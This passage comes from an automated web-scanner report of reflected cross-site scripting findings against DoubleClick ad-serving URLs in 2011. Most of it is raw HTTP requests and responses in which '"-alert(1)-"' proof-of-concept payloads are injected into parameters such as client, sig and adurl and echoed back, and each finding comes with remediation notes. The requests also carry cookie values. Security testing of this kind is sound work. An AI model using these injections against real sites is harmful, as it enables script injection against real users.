GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ%00962c0"-alert(1)-"a036383781d&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7005
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 13:14:19 GMT
Expires: Sat, 26 Mar 2011 13:14:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ%00962c0"-alert(1)-"a036383781d&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=http://ads.networksolutions.com/landing?code=P61C151S512N0B2A1D687E0000V100&promo=BCXXX03936");
var fscUrl = url;
va
...[SNIP]...
5.3. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e67df"-alert(1)-"af922d3d5bf was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912e67df"-alert(1)-"af922d3d5bf&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7035
Date: Sat, 26 Mar 2011 13:14:48 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:48 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912e67df"-alert(1)-"af922d3d5bf&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V100%26promo%3DBCXXX03936");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...
5.4. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a362b"-alert(1)-"c0a292ff252 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1a362b"-alert(1)-"c0a292ff252&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7004
Date: Sat, 26 Mar 2011 13:14:28 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:28 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
qLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1a362b"-alert(1)-"c0a292ff252&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP99C519S512N0B2A1D38E0000V109");
var fscUrl = url;
var fscUrlClickT
...[SNIP]...
5.5. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c075c"-alert(1)-"98c9a8f876d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QAc075c"-alert(1)-"98c9a8f876d&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7074
Date: Sat, 26 Mar 2011 13:14:38 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:38 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QAc075c"-alert(1)-"98c9a8f876d&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...
5.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e51"-alert(1)-"b2b22d2d3e9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lc1e51"-alert(1)-"b2b22d2d3e9&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7040
Date: Sat, 26 Mar 2011 13:14:07 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:07 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/18b/%2a/b%3B234428571%3B0-0%3B0%3B50265527%3B3454-728/90%3B38431379/38449136/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lc1e51"-alert(1)-"b2b22d2d3e9&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl
...[SNIP]...
5.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccbd9"-alert(1)-"b691060660c was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=ccbd9"-alert(1)-"b691060660c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6855
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 25 Mar 2011 19:17:44 GMT
Expires: Fri, 25 Mar 2011 19:17:44 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
zovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=ccbd9"-alert(1)-"b691060660chttp://learning.capella.edu/banners.aspx?revkey=151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...
5.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ead3"-alert(1)-"0df83226a7e was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ8ead3"-alert(1)-"0df83226a7e&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:14:32 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:14:32 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
nAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ8ead3"-alert(1)-"0df83226a7e&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...
5.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93684"-alert(1)-"04063d9d42c was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-406387893378091293684"-alert(1)-"04063d9d42c&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
